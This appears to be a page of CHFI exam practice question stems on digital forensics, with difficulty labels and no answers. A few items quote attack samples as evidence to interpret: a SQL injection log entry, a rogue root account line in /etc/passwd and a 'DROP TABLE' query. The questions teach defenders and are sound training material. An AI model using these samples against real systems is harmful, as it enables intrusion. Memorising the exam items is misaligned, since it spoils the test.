Easy639A forensic examiner is preparing to acquire a forensic image of a running Windows 10 laptop suspected of containing evidence of intellectual property theft. The examiner must capture volatile data that could be lost if the system is shut down. Which TWO of the following actions should the examiner take to preserve volatile evidence before imaging? (Choose two.)
Hard640During a forensic investigation, an analyst needs to recover recently deleted files from a FAT32 partition. Which of the following techniques is MOST effective for recovering files whose directory entries have been marked as deleted but the clusters have not yet been overwritten?
Easy641A forensic examiner is analyzing a Windows system and wants to determine the last time a specific user logged on interactively. Which Windows Event Log artifact should the examiner review?
Easy642Which TWO of the following are types of write blockers used in forensic imaging? (Select two.)
Easy643Which TWO of the following are types of slack space that can contain forensic evidence?
Easy644An incident responder is analyzing a compromised Windows workstation. Which TWO artifacts would provide the STRONGEST evidence of a malware persistence mechanism?
Medium645An analyst extracts an iTunes backup from a Windows computer. The backup contains a file manifest.plist with cryptographic hashes. What is the primary purpose of these hashes in the backup process?
Hard646An analyst is examining a USB drive that appears to have a smaller capacity than expected. The drive is detected as 8 GB but only 7 GB is accessible. Which of the following is the most likely cause?
Hard647An analyst recovers a disk image from a Linux server that used ext4. The image shows a superblock backup at multiple offsets. Which dd command would correctly extract the backup superblock located at offset 32768 bytes?
Hard648Which THREE of the following are challenges specific to forensic analysis of solid-state drives (SSDs) compared to traditional hard disk drives? (Select 3)
Hard649In cloud forensics, which AWS service logs API calls for governance, compliance, and operational auditing, and is the primary source for detecting unauthorized access?
Medium650During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by a 'Accepted password for root' entry. What is the MOST likely conclusion?
Hard651A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?
Medium652During an incident response, a first responder needs to collect evidence from a Linux server that is still running. The server has sensitive data and cannot be shut down. Which technique is BEST for acquiring a forensic image of the hard disk?
Hard653Which cloud service log is most appropriate for tracking API calls and resource changes in an AWS environment?
Easy654An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?
Hard655During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?
Medium656Which type of evidence is a witness's statement that they saw someone log into a computer?
Medium657A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?
Medium658Which tool is specifically designed for file carving and can recover files based on headers and footers without relying on file system metadata?
Easy659Which TWO of the following are essential components of a computer forensics lab according to CHFI best practices?
Hard660A forensic analyst is investigating a Windows system and needs to examine the contents of the Recycle Bin. Which file artifact contains metadata about deleted files, including original file paths and deletion times?
Easy661What is the primary purpose of the Host Protected Area (HPA) on a hard disk drive?
Easy662During an investigation of a suspected data exfiltration, a forensic analyst examines MySQL general query logs and finds a large number of SELECT queries retrieving customer records, followed by DELETE queries. Which of the following is the most likely conclusion?
Medium663Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)
Hard664A forensic examiner needs to create a bit-for-bit copy of a suspect's hard drive for analysis. Which tool is specifically designed for this purpose and can also verify integrity using hashing?
Medium665In a cloud forensic investigation, the analyst needs to obtain a memory dump of a virtual machine. Which method is considered forensically sound?
Medium666Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)
Medium667In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)
Medium668A malware analyst is performing dynamic analysis of a suspected trojan in a sandbox environment. Which of the following behaviours are strong indicators that the malware is establishing persistence on the infected system? (Select THREE.)
Hard669Which TWO of the following are common hashing algorithms used to verify the integrity of forensic images? (Select two.)
Easy670During a forensic analysis of a drive, the examiner discovers a Host Protected Area (HPA). What is the primary purpose of an HPA?
Medium671A forensic investigator is examining a MySQL database server that was compromised. The investigator needs to determine which user account was used to perform unauthorized modifications to a critical table. The MySQL server has the general query log enabled. Which of the following should the investigator review to find the user account associated with the modifications?
Easy672During dynamic analysis of a malware sample, an analyst observes the following: creation of a mutex named `Global\{9A2D7E1C-3F4B-4A5E-9B8C-1D2E3F4A5B6C}`, a registry key under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` named `WindowsUpdate`, and outbound TCP traffic to `203.0.113.5:443`. Which THREE of the following indicators of compromise (IoCs) should be documented?
Hard673Which TWO of the following tools are commonly used for file carving in forensic investigations?
Medium674Which TWO of the following are requirements for evidence to be admissible in court? (Select two.)
Medium675During the first response to a computer incident, which of the following actions is MOST critical for preserving evidence?
Easy676A forensic analyst is preparing to testify as an expert witness in court. Which of the following characteristics is MOST essential for the court to accept the analyst's testimony?
Hard677An investigator is analyzing an Android device and finds a database file in /data/data/com.whatsapp/databases/msgstore.db. Which type of information is MOST likely stored in this database?
Medium678During a forensic examination, an analyst uses the command 'dcfldd if=/dev/sda of=image.dd hash=sha256 hashlog=hash.txt'. What is the primary purpose of including 'hash=sha256' in this command?
Hard679Which THREE of the following correctly describe the rules of evidence as applied to digital forensics? (Select three.)
Hard680A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?
Medium681An Android forensic examiner performs a physical acquisition on a device. Which TWO of the following are typical artefacts that can be recovered from the /data/data/ directory on a non-rooted device if the acquisition method allows full file system access?
Easy682During dynamic analysis of a malware sample, an analyst uses Process Monitor to monitor file system activity. The malware creates a file named 'C:\Users\Admin\AppData\Roaming\svchost.exe'. What does this likely indicate?
Medium683During a forensic investigation of a MongoDB database, the analyst needs to identify which user executed a particular write operation. Which MongoDB log or feature should the analyst examine?
Medium684A forensic analyst is examining a hard drive that was seized from a suspect's home. The analyst uses FTK Imager to create a forensic image. After imaging, the analyst computes the MD5 hash of the image and compares it to the hash computed at the scene. The hashes match. What does this confirm?
Medium685During a forensic examination of an NTFS drive, an investigator finds that a file 'notes.txt' has an additional data stream named 'hidden.txt' attached. Which feature of NTFS allows this?
Medium686A forensic examiner is acquiring a running Linux server that is part of a live incident response. The server hosts a critical database and cannot be taken offline. The examiner needs to capture volatile data in a forensically sound manner. Which TWO of the following actions should the examiner perform? (Choose two.)
Hard687Which US Constitutional amendment primarily governs the legality of searching and seizing digital devices?
Easy688A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?
Easy689An analyst is recovering deleted files from a FAT32 file system. The file system uses a cluster size of 4096 bytes. The first cluster of a deleted file is cluster 100. Which structure contains the chain of clusters for this file?
Medium690An investigator recovers a file from unallocated space on an NTFS drive using file carving. The file appears to contain alternate data streams (ADS). Which tool can be used to list all ADS associated with a file on a live Windows system?
Hard691An analyst is investigating a Linux server running ext4 and needs to recover deleted files that may have been overwritten partially. Which technique is BEST suited for recovering fragments of known file types when the inode metadata is lost?
Medium692A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?
Medium693An analyst is examining an NTFS volume and finds that a file's $MFT record indicates it is resident. What does this imply about the file's data?
Hard694In malware static analysis, a PE file is examined. The section names include '.text', '.rdata', '.data', and '.rsrc'. The entry point is in the .text section. Which tool would be MOST appropriate to identify any packer that might be obfuscating the code?
Medium695A forensic investigator is examining a suspicious file and wants to determine its true file type regardless of its extension. The investigator runs the 'file' command on the file and receives the output 'PE32 executable (GUI) Intel 80386, for MS Windows'. However, the file has a .txt extension. What is the most likely explanation for this discrepancy?
Easy696In malware forensics, which of the following is an indicator of compromise (IoC) that can be used to detect a specific malware strain across multiple systems?
Medium697Which TWO of the following are valid methods for hiding data on an NTFS volume without using third-party tools? (Select 2)
Medium698A forensic investigator uses FTK Imager to create a forensic image of a suspect's laptop. The acquisition generates both an E01 file and a corresponding hash file. Which statement accurately describes the integrity verification process in FTK Imager?
Hard699During a forensic examination of an NTFS drive, an analyst runs 'fsutil usn readjournal C:' and observes a large number of USN journal entries for a specific file after a certain date. The file's $MFT record shows a last modified timestamp far earlier than the journal entries. What does this discrepancy suggest?
Hard700You are a first responder for a medium-sized enterprise. The Help Desk received multiple reports that users cannot access the company's internal web application (app.example.com) hosted on a Windows Server 2019 VM. The server is also running a MySQL database and an FTP service for file transfers. You remote into the server and find that the web server (IIS) is still running, but the application pool is stopped. The event logs show multiple failed logon attempts from an external IP address (198.51.100.23) for the local administrator account around the time the issues started. The FTP service log shows successful anonymous logins from the same IP minutes before the web app failure. The MySQL log shows a query 'DROP TABLE users;' executed at 03:15 AM. The current time is 04:00 AM. What immediate action should you take?
Medium701Which THREE of the following are challenges specific to container forensics?
Hard702During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?
Medium703A forensic investigator is analyzing a Linux ext4 file system. They suspect a file was deleted but its inode may still be intact. Which tool can be used to recover the file by referencing the inode?
Medium704Which THREE of the following are challenges specific to forensic analysis of solid-state drives (SSDs) compared to traditional hard disk drives (HDDs)? (Select three.)
Hard705Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?
Easy706An investigator notes that a file on an NTFS volume has a resident data size of 900 bytes, but the $DATA attribute lists an allocated size of 1024 bytes. What does this indicate?
Hard707A forensic analyst is testifying in court as an expert witness. What is the PRIMARY role of an expert witness in digital forensics?
Medium708An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)
Hard709During an investigation of a compromised system, the analyst discovers that the suspect used steganography to hide data within image files. Which forensic tool is BEST suited for detecting hidden data in images through statistical analysis?
Medium710A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)
Hard711During a forensic investigation of an Android device, the examiner uses ADB to extract data. Which command would create a full backup of the device's data partition, including app data and shared storage?
Medium712A forensic analyst is examining an SSD that may have had deleted files. The analyst is concerned about the TRIM command. What effect does TRIM have on forensic recovery of deleted files?
Medium713In a memory forensics investigation using Volatility, an analyst wants to see a list of processes that were active at the time of acquisition, including hidden processes. Which Volatility command should be used?
Medium714Which of the following partition table types uses a protective MBR and a GPT header, and is recommended for disks larger than 2 TB?
Easy715During an iOS forensic analysis, an examiner recovers the Keychain data from a backup. Which type of information is commonly stored in the iOS Keychain and can be extracted during analysis?
Medium716An Android device is seized as evidence. The screen is locked with a PIN. Which tool or method is MOST appropriate for acquiring a physical image of the device without bypassing the lock screen, assuming the device is rooted?
Medium717A security analyst is reviewing Apache access logs and finds the entry: 192.168.1.100 - - [10/Mar/2025:08:12:34 +0000] "GET /search?q=test' OR '1'='1 HTTP/1.1" 200 532. Which attack does this log entry most likely indicate?
Easy718During a forensic investigation, an analyst examines a hard disk and notices that the partition table uses a 64-bit scheme with a maximum of 128 partitions. Which partition table type is in use?
Easy719Which tool is specifically designed for performing physical extraction of iOS devices and is widely used by law enforcement for bypassing passcode restrictions on modern iPhones?
Easy720Based on the exhibit, what is the most likely indication of malware persistence?
Medium721Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?
Easy722A forensic analyst is investigating a Docker container that was used to launch a network attack. The container has been stopped but not removed. Which action should the analyst take FIRST to preserve volatile evidence?
Hard723An investigator acquires an SSD from a laptop that has been turned off for 24 hours. The suspect recently deleted several incriminating files. Using a forensic imager, the investigator creates a bit-for-bit copy. However, when analyzing the image, the deleted files' data appears to be zeros. What is the MOST likely cause?
Hard724An organization uses Azure. A security analyst needs to investigate a suspicious login event. Which Azure log contains details about user sign-ins, including IP address, timestamp, and success/failure status?
Medium725A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?
Medium726During a forensic examination, the analyst encounters a file that is not automatically readable by forensic tools. The analyst suspects the file contains contraband images. Which of the following is the BEST approach to handle this evidence in accordance with the rules of evidence?
Medium727A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?
Medium728During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?
Hard729Which cloud forensic challenge refers to the inability to physically access the storage media where data resides?
Easy730In cloud forensics, which AWS service provides a centralized log of API calls made by users and services, often used to investigate unauthorized access or configuration changes?
Medium731A security analyst receives an image of a hard drive with a GPT partition table. Which of the following is a key difference between GPT and MBR that the analyst should consider?
Medium732During a cloud forensic investigation, an analyst needs to identify who deleted an S3 bucket in an AWS environment. Which AWS service log should the analyst examine to find the API call and the associated IAM user or role?
Medium733An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?
Hard734Which TWO pieces of information can be obtained from an email's Received headers to help trace the email's origin? (Select TWO)
Medium735A forensic analyst is reviewing the syslog from a compromised Linux server. Based on the exhibit, what does the 'orphan inode deleted' message indicate?
Hard736Which of the following email authentication protocols uses a digital signature to verify the sender's domain and that the email has not been tampered with?
Easy737Which Azure log source should an investigator query to identify who deleted a virtual machine and when?
Medium738A forensic analyst is examining a RAID 5 array consisting of three disks. One disk has failed and has been replaced. The array is rebuilt automatically. However, the analyst needs to recover deleted files that existed before the rebuild. What is the MOST significant challenge in this scenario?
Hard739Refer to the exhibit. A database administrator finds the above error log entries when attempting to start the MySQL service. The server was working fine yesterday. What is the most likely cause of this issue?
Hard740An investigator examines an iPhone backup file. Inside the backup manifest, they find a file path 'AppDomainGroup-group.com.example.app'. This indicates the data belongs to which type of app container?
Medium741In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?
Medium742A security team needs to preserve network evidence for a potential legal case. What is the BEST practice for capturing volatile network data?
Easy743Which TWO of the following tools are commonly used for file carving during forensic investigations?
Medium744During a forensic examination of a Windows 10 system, an investigator runs the following command: 'fsutil usn readjournal C: > usn_output.txt'. What is the primary purpose of this action?
Medium745A forensic analyst is investigating a malware incident on a Windows system and suspects that the malware uses process injection to execute malicious code within a legitimate process. The analyst has acquired a memory dump of the system. Which two of the following techniques should the analyst use to detect and analyze process injection? (Choose two.)
HardOther domains
All CHFI exam domains
Frequently asked questions
- What does the scenario questions domain cover on the CHFI exam?
- scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
- How many questions are in this domain?
- This page lists all 745 scenario questions questions in the CHFI question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only scenario questions questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.